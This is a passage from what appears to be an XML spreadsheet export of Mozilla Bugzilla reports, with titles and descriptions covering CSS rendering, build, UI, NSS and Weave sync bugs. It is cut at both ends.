http://lxr.mozilla.org/seamonkey/source/mailnews/base/prefs/resources/content/AccountWizard.js#87</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-524349</t>
  </si>
  <si>
    <t>Port |Bug 517417 - access violation: while compiling xulrunner tries to test for Mercurial repositories above its build dir| to comm-central</t>
  </si>
  <si>
    <t>CORE-520942</t>
  </si>
  <si>
    <t>Parallelism Opportunities in CSS Selector Matching</t>
  </si>
  <si>
    <t>The purpose of this bug report is capturing the results of parallelism opportunity investigations in CSS rule-matching and tracking the related implementation progress.
This bug is also closely related to the bug #493651 which is about performance opportunities in CSS rule-matching in a more general context:  
https://bugzilla.mozilla.org/show_bug.cgi?id=493651</t>
  </si>
  <si>
    <t>mohammad.r.haghighat</t>
  </si>
  <si>
    <t>CORE-396512</t>
  </si>
  <si>
    <t>Provide a way to get disassembly output</t>
  </si>
  <si>
    <t>js&gt; void dis(function(){}) 
flags: LAMBDA INTERPRETED
...
This makes it annoying to fuzz dis() for crashes because it adds a lot of output.  I think dis() should return the disassembly instead of printing it.  For the normal use case of dis() typing it at the top level in the REPL this change won't affect the output.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-225374</t>
  </si>
  <si>
    <t>Left side menu does not appear as defined in css file.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6b) Gecko/20031108
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6b) Gecko/20031108
The menu on the left side of page do not appear correctly.  The links are
underlined and the font is incorrect according to the .css file located at
http://www.canoe.ca/Jincludes/jam.css .
When hovering over the left side menu the links appear correctly and if the link
has been visited previously it appears correctly. 
Reproducible: Always
Steps to Reproduce:
1.go to http://jam.canoe.ca/JamBooks/home.html
Actual Results:  
Menu on Left side has underlined links and the font is the wrong size.  If you
hover over the links the correct font and colour are displayed. Font and colour
are also correct if the link has been visited
A similar page ( http://jam.canoe.ca/Jam/ ) seems to appear correctly.  The only
difference I could see was the style was in the page instead of being a link to
the css file.
I noticed the same behaviour in Netsape 7.1 in Windows as well.  Works properly
in IE and Konqueror.</t>
  </si>
  <si>
    <t>MINIMO_GRAVEYARD-319587</t>
  </si>
  <si>
    <t>make minimo build on linux.</t>
  </si>
  <si>
    <t>linux doesn't build.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-405744</t>
  </si>
  <si>
    <t>Re-implement Command-back/forward handling</t>
  </si>
  <si>
    <t>Due to changes in the way Cocoa widgets propagate key events on trunk the current implementation of Command-back/forward is not going to work which is now considered expected behavior.
Instead the current thinking is that we need to implement this as performKeyEquivalent: handler that checks whether a text field is focused and treats it as a history command if not.</t>
  </si>
  <si>
    <t>CORE-397373</t>
  </si>
  <si>
    <t>Make &amp;state=disabled work again</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.3) Gecko/20061201 Firefox/2.0.0.3 (Ubuntu-feisty)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.3) Gecko/20061201 Firefox/2.0.0.3 (Ubuntu-feisty)
For perfect OS integration on Linux/GNOME it would be very nice if we could create a theme that always picks up the icons from the GTK icon theme.
This is possible today by using moz-icon://stock/*. The only problem so far is that I am unable to create the disabled state of buttons because there is no way to display a button in grayscale and XUL doesn't seem to do this itself (when the button is disabled).
Now creating separate icons for disabled stats would be possible but it also defeats the whole purpose of this. So would it be possible to provide a -moz-disabled property similar to -moz-opacity which draws the icon with less saturation to make it look gray/disabled?
Reproducible: Always</t>
  </si>
  <si>
    <t>michael.monreal+moz</t>
  </si>
  <si>
    <t>WEBMAKER_GRAVEYARD-882187</t>
  </si>
  <si>
    <t>Add s3 to default-config</t>
  </si>
  <si>
    <t>The server crashes if you don't have these in your local.json.</t>
  </si>
  <si>
    <t>kate</t>
  </si>
  <si>
    <t>CORE-292656</t>
  </si>
  <si>
    <t>Drop-down selection box with CSS height attribute grows in width when changing selection</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b2) Gecko/20050502
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b2) Gecko/20050502
Changing the selection of a drop-down selection with non-auto height attribute
increases the horizontal size of the selection box.
Reproducible: Always
Steps to Reproduce:
1. Change the selection of a drop-down selection box with style=heigth: 
Actual Results:  
The horizontal size of the selection box increases whenever the selection changes.
Expected Results:  
The size does not change.</t>
  </si>
  <si>
    <t>jdarmochwal</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-468347</t>
  </si>
  <si>
    <t>Use native JSON support for parsing JSON if available</t>
  </si>
  <si>
    <t>A lot of the beachballing graph server causes seems to be due to its JSON parsing.  We should look into using the native JSON support Gecko has nowadays to do this faster.</t>
  </si>
  <si>
    <t>TOOLKIT-231361</t>
  </si>
  <si>
    <t>download manager doesn't show downloaded filesize after 1MB if the filesize is unknown</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7a) Gecko/20040115 Firebird/0.8.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7a) Gecko/20040115 Firebird/0.8.0+
For example PHPmyadmin offers exporting of the database-files and after
choosing some properties the file begins to download which actually has an
unknown size. MozillaFirebird shows the correct size till the downloaded size
reaches 1MB and then the text showing the downloaded filesize disappears
(there's only: at [speed] ??? remain).
Nevertheless the download finishes as expected and everything is OK with the
downloaded file.
Reproducible: Always
Steps to Reproduce:
1. download a file with an unknown filesize
2. wait till the downloaded filesize reaches 1MB
3. the downloaded filesize disappears
Actual Results:  
MozillaFirebird doesn't show the downloaded filesize after 1MB.
Expected Results:  
MozillaFirebird should show the downloaded filesize after 1MB.</t>
  </si>
  <si>
    <t>THUNDERBIRD-229112</t>
  </si>
  <si>
    <t>Unable to bring up a compose window in debug builds</t>
  </si>
  <si>
    <t>Brian 
Since picking up your check in for Bug #227690 I am no longer able to bring up
a compose window in debug builds.
I get an infinite number of assertions with the following stack trace:
PresContext must be non-null
nsBoxLayoutState::nsBoxLayoutState(nsIPresContext * 0x00000000) line 62 + 38 bytes
nsGridRowLeafFrame::GetBorderAndPadding(nsGridRowLeafFrame * const 0x03e1173c
nsMargin &amp; {...}) line 103
nsBox::AddBorderAndPadding(nsIBox * 0x03e1173c nsSize &amp; {...}) line 1452
nsBoxLayout::AddBorderAndPadding(nsIBox * 0x03e1173c nsSize &amp; {...}) line 78 +
13 bytes
nsGridRowLeafLayout::GetMinSize(nsGridRowLeafLayout * const 0x03e323b8 nsIBox *
0x03e1173c nsBoxLayoutState &amp; {...} nsSize &amp; {...}) line 112
nsContainerBox::GetMinSize(nsContainerBox * const 0x03e1173c nsBoxLayoutState &amp;
{...} nsSize &amp; {...}) line 540 + 38 bytes
nsBoxFrame::GetMinSize(nsBoxFrame * const 0x03e1173c nsBoxLayoutState &amp; {...}
nsSize &amp; {...}) line 972 + 20 bytes
nsContainerBox::GetPrefSize(nsContainerBox * const 0x03e1173c nsBoxLayoutState
&amp; {...} nsSize &amp; {...}) line 513
nsBoxFrame::GetPrefSize(nsBoxFrame * const 0x03e1173c nsBoxLayoutState &amp; {...}
nsSize &amp; {...}) line 934 + 20 bytes
This worked fine before updating to pick up these changes.</t>
  </si>
  <si>
    <t>THUNDERBIRD-474807</t>
  </si>
  <si>
    <t>Margin and Padding CSS rules should be independent of UI direction (LTR or RTL)</t>
  </si>
  <si>
    <t>We should use direction-independent CSS rules throughout the UI. I will cover Calendar and SeaMonkey with my patches as well.
Here are links to many occurrences of this bug in our codebase:
Use of padding-left (should be replaced with -moz-padding-start):
- http://mxr.mozilla.org/comm-central/search?string=padding-left&amp;find=mail&amp;tree=comm-central
- http://mxr.mozilla.org/comm-central/search?string=padding-left&amp;find=calendar&amp;tree=comm-central
- http://mxr.mozilla.org/comm-central/search?string=padding-left&amp;find=suite&amp;tree=comm-central
Use of padding-right (should be replaced with -moz-padding-end):
- http://mxr.mozilla.org/comm-central/search?string=padding-right&amp;find=mail&amp;tree=comm-central
- http://mxr.mozilla.org/comm-central/search?string=padding-right&amp;find=calendar&amp;tree=comm-central
- http://mxr.mozilla.org/comm-central/search?string=padding-right&amp;find=suite&amp;tree=comm-central
Use of margin-left (should be replaced with -moz-margin-start):
- http://mxr.mozilla.org/comm-central/search?string=margin-left&amp;find=mail&amp;tree=comm-central
- http://mxr.mozilla.org/comm-central/search?string=margin-left&amp;find=calendar&amp;tree=comm-central
- http://mxr.mozilla.org/comm-central/search?string=margin-left&amp;find=suite&amp;tree=comm-central
Use of margin-right (should be replaced with -moz-margin-end):
- http://mxr.mozilla.org/comm-central/search?string=margin-right&amp;find=mail&amp;tree=comm-central
- http://mxr.mozilla.org/comm-central/search?string=margin-right&amp;find=calendar&amp;tree=comm-central
- http://mxr.mozilla.org/comm-central/search?string=margin-right&amp;find=suite&amp;tree=comm-central
In addition all margin: and padding: styles rules with four (4) values need to be audited for differing left and right values. Those style rules will need to be replaced with appropriate *-top *-bottom *-start and *-end rules</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-478328</t>
  </si>
  <si>
    <t>Client never deletes old history data</t>
  </si>
  <si>
    <t>The client should send a DELETE to the server to delete old data regularly.</t>
  </si>
  <si>
    <t>NSS-496993</t>
  </si>
  <si>
    <t>Add accessor functions for SSL_ImplementedCiphers</t>
  </si>
  <si>
    <t>Right now the array SSL_ImplementedCiphers is declared in the
public header ssl.h as an array rather than a pointer:
  /* constant table enumerating all implemented SSL 2 and 3 cipher suites. */
  SSL_IMPORT const PRUint16 SSL_ImplementedCiphers[]
For some reason this causes the Linux linker ld to record the
size of the array at link time and that size is compared with
the actual array size at run time.  If the two sizes differ ld
emits a scary runtime warning message when an app that uses
SSL_ImplementedCiphers starts up:
./chrome: Symbol `SSL_ImplementedCiphers' has different size in shared 
object consider re-linking
This is reported in the following Chromium bug report:
http://code.google.com/p/chromium/issues/detail?id=12826
I'm not sure if we can declare SSL_ImplementedCiphers as a
pointer in ssl.h without breaking binary compatibility.
It would be safe to add a function that returns SSL_ImplementedCiphers:
const PRUint16 *
SSL_GetImplementedCiphers()
{
    return SSL_ImplementedCiphers
}
or a function that returns the i-th implemented cipher:
PRUint16
SSL_GetImplementedCipher(PRUint16 i)
{
    if (i &gt;= SSL_NumImplementedCiphers)
        return 0
    return SSL_ImplementedCiphers[i]
}</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-523093</t>
  </si>
  <si>
    <t>MoMo AUS - no updates available.</t>
  </si>
  <si>
    <t>I've got Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1.5pre) Gecko/20091017 Lightning/1.0pre Shredder/3.0pre and it is telling me there are no updates available even though I know yesterday's nightly was fine.
Ludovic has 20091016 and doesn't get any updates either and I've seen another mention of no updates as well.
I think 3.1a1pre is broken in the same way.</t>
  </si>
  <si>
    <t>MARKETING-932467</t>
  </si>
  <si>
    <t>Congstar/Firefox OS graphic for German Facebook post</t>
  </si>
  <si>
    <t>&gt;&gt;Project/Request Title:
Congstar/Firefox OS graphic for German Facebook post
&gt;&gt;Project Overview:
Team
We need to explore how we might tastefully in a brand-compliant way add a partner logo into a Firefox OS Facebook graphic along with the Firefox logo. Something that implies that we're partners but per Pete that include photos that reflect who we are (vs reflecting Congstar product exclusively)?
If possible it would be great to see two examples. I'm guessing that John would need to show to Pete once we decide on direction 
The copy that has already been approved for the post is:
#FirefoxOS is the only phone with adaptive search. It's always changing to offer you the exact apps you need the moment you need them! Get yours today!
For Congstar we're changing the last sentence to Get yours from Congstar today
The original idea for the graphic was a photo of someone holding the phone with adaptive search on the screen (specifically in German in this case). But we're open to ideas - you have a much better idea of the graphics available to us. We have some photo compilations here as well. https://etherpad.mozilla.org/FirefoxOSphotos
I imagine some kind of imagery with the brand guideline of having the Firefox logo in the corner. Perhaps the congstar logo is in the other corner? 
This is a rush job (we're scrambling here as well to make this work.)
The post goes up Nov. 10. We'd need to see graphics by Nov. 6 which would give us two days to get all the approvals (Plus Congstar needs to see) If this is an unworkable deadline please advise.
&gt;&gt;Creative Specs &amp; Deliverables:
Standard FB graphic size
&gt;&gt;Launch Date:
2013-11-10
&gt;&gt;Creative Due Date:
2013-11-06
&gt;&gt;Mozilla Goal:
Firefox OS
&gt;&gt;Points of Contact:
mthayer@mozilla.com</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-419710</t>
  </si>
  <si>
    <t>Subscribe to RSS feed didn't initially work when specifying Vienna reader</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en rv:1.8.1.12pre) Gecko/20080118 Camino/1.6b2 (like Firefox/2.0.0.12pre)
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en rv:1.8.1.12pre) Gecko/20080118 Camino/1.6b2 (like Firefox/2.0.0.12pre)
Browsing to Applications directory and selecting Vienna 2.2.2.2212 didn't work after repeated attempts.  The error disappeared some point after running NetNewsWire Lite (I can't run the latest version as it doesn't work on OSX 10.3.9).  NetNewsWire was installed a long time ago a year or so and it hadn't been run in a while.
Related I had killed and restarted Camino between the time of the error and the time things ran ok.  I also opened Safari and Firefox.
Reproducible: Couldn't Reproduce
Steps to Reproduce:
1.  Browse to RSS webpage.
2.  Subscribe to RSS feed right click on icon in URL line (or select Preferences Feed reader).
3.  Browse to Applications path.
Actual Results:  
Instead of Vienna showing up a blank appears and nag screen something like no application installed.
Expected Results:  
The Vienna application should have opened with the RSS feed selected.
This console message may correlate to the error event:
2008-02-26 14:49:09.719 Camino[4221] *** -[FeedServiceController setDefaultFeedViewerWithIdentifier:]: selector not recognized</t>
  </si>
  <si>
    <t>acmiddleton</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-352827</t>
  </si>
  <si>
    <t>Appearance pref pane leaks font mapping table on every load</t>
  </si>
  <si>
    <t>setupFontRegionPopup is called on every pane load which creates and retains mRegionMappingTable but mRegionMappingTable is only released in dealloc.  It needs to be released whenever the pane is unloaded since right now that array and everything in it are leaked.</t>
  </si>
  <si>
    <t>CORE-368477</t>
  </si>
  <si>
    <t>Unsuitable behaviour when $HOME is not set</t>
  </si>
  <si>
    <t>(I've also heard of crashes but I'm not quite sure about this)
When $HOME is not set the application whatever it may be tries to find the profile in a /.$VENDOR/ directory for example.
Basically the main problem is that GetUnixHomeDir (http://lxr.mozilla.org/seamonkey/source/xpcom/io/SpecialSystemDirectory.cpp#222) just tries to get the HOME environment variable without a fallback. If HOME is not set it should use getpwuid(getuid())-&gt;pw_dir (or the NSPR equivalent if there is any).
Speaking of this function it's strange that VMS uses getenv while others use PR_GetEnv probably something that should be corrected.
I also found several places that use the HOME environment variable such as http://lxr.mozilla.org/seamonkey/source/xpcom/io/nsAppFileLocationProvider.cpp#378 or http://lxr.mozilla.org/seamonkey/source/toolkit/xre/nsXREDirProvider.cpp#951 they probably should use the GetUnixHomeDir instead.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-288743</t>
  </si>
  <si>
    <t>Add the ability to create the download folder - in the download prefpane.</t>
  </si>
  <si>
    <t>When selecting the download destination folder users can only select existing
folders. Adding a create folder would be nice.</t>
  </si>
  <si>
    <t>CORE-341747</t>
  </si>
  <si>
    <t>Remove #ifdef/ifndef from nsIAccessible.idl</t>
  </si>
  <si>
    <t>We need consistent use of roles in the cross platform code.
The mapping to platform role constants should occur in the nsAccessibleWrap classes.</t>
  </si>
  <si>
    <t>gaomingcn</t>
  </si>
  <si>
    <t>CORE-30729</t>
  </si>
  <si>
    <t>Mac trees always showing focus style</t>
  </si>
  <si>
    <t>For a while now there has been a bug where the focus style from css was not being 
removed from trees that were no longer in focus unless the mouse was moved over 
the element in which case it would update to show the non-focused state.
Now on my Mac debug build from about 11:30am today all the trees everywhere 
always show the focus state.  I just checked a Windows build and it still has the 
behavior described above.</t>
  </si>
  <si>
    <t>SEAMONKEY-83001</t>
  </si>
  <si>
    <t>Search results window does not show To: field</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:0.9+) Gecko/20010526
BuildID:    2001052620
I have (hmm) years of sent mail in a folder 'store' and
when I search it the results window tells me who the
sender is (me) but not who it was addressed To:
Such a piece of information can be very useful.
Reproducible: Always</t>
  </si>
  <si>
    <t>emmet</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-442257</t>
  </si>
  <si>
    <t>Weave 1.32: WeaveCrypto doesn't work under Linux</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9) Gecko/2008061015 Firefox/3.0
Build Identifier: 1.32
The newly released Weave 0.1.32 (developer build) doesn't work under Linux. Almost all operations fail with a WeaveCrypto-related error. This includes account-creation signing in syncing and possibly others. The same operations work fine under Windows.
Reproducible: Always
Steps to Reproduce:
1. Create an account online at https://sm-labs01.mozilla.org:81/client/
2. (optional) Initialize the account by doing an initial sync under Windows which works fine
3. Try to sign-in using Weave 1.32 under Linux
Actual Results:  
All attempted operations fail with WeaveCrypto-related errors. Here is the Verbose Log:
2008-06-27 17:01:55	Service.DAV	DEBUG	LOCK request for lock
2008-06-27 17:01:56	Service.DAV	DEBUG	GET request for meta/version
2008-06-27 17:01:57	Service.Main	TRACE	Retrieving keypair from server
2008-06-27 17:01:57	Service.DAV	DEBUG	GET request for private/privkey
2008-06-27 17:01:58	Service.DAV	DEBUG	GET request for public/pubkey
2008-06-27 17:01:58	Service.BmkEngine	INFO	Beginning sync
2008-06-27 17:01:58	Service.DAV	DEBUG	GET request for user-data/
2008-06-27 17:01:59	Service.DAV	DEBUG	GET request for user-data/bookmarks/
2008-06-27 17:02:00	Service.DAV	DEBUG	GET request for user-data/bookmarks/deltas/
2008-06-27 17:02:01	Service.RemoteStore	DEBUG	Downloading status file
2008-06-27 17:02:01	Service.DAV	DEBUG	GET request for user-data/bookmarks/status.json
2008-06-27 17:02:01	Service.Resource	DEBUG	GET request successful
2008-06-27 17:02:01	Service.JsonFilter	DEBUG	Decoding JSON data
2008-06-27 17:02:01	Service.RemoteStore	DEBUG	Downloading status file... done
2008-06-27 17:02:01	Service.BmkEngine	INFO	Local snapshot version: -1
2008-06-27 17:02:01	Service.BmkEngine	INFO	Server maxVersion: 0
2008-06-27 17:02:01	Service.DAV	DEBUG	GET request for user-data/bookmarks/keys.json
2008-06-27 17:02:02	Service.Resource	DEBUG	GET request successful
2008-06-27 17:02:02	Service.JsonFilter	DEBUG	Decoding JSON data
2008-06-27 17:02:03	Service.Main	ERROR	Cc['@labs.mozilla.com/Weave/Crypto1'] is undefined (file 'file:///home/pesho/.mozilla/firefox/vjka8nht.Default/extensions/%7B340c2bbc-ce74-4362-90b5-7c26312808ef%7D/modules/crypto.js' line 72)
2008-06-27 17:02:03	Service.Main	ERROR	()@file:///home/pesho/.mozilla/firefox/vjka8nht.Default/extensions/%7B340c2bbc-ce74-4362-90b5-7c26312808ef%7D/modules/crypto.js:72
Crypto_unwrapKey(LkbXapaU83oWGYBCjXBAezz/BuqWaV5o75JJXYnPRvIwNed5woZ3BRtJZZkkud50fZSLr6Qrevfrht6TfJ7lioLITY+nDudC0pk8wz9f2m6N714kkuCZe2AtQ7LRpDkCgYx82Os9mfBanKVhgou14hnU7VkipxkNFyiYb+i2GoJ9/bueCEbPDtdzK6ZXU8bBjJ3Nx3lCsr3wWJE1uyNwnorKLlmJ6ofM2FO63dU4rHZRm0TaESLaJFz8o47X1BvMZrK/CDBNawwmS9pqbDreKk3m/KBoaaNAAo1q7Rx9v991tyQdZXOd7xn0MC8IXGereUGehzUKf4psfJHJp8if5Q==[object Object])@file:///home/pesho/.mozilla/firefox/vjka8nht.Default/extensions/%7B340c2bbc-ce74-4362-90b5-7c26312808ef%7D/modules/crypto.js:225
AsyncGen_run()@file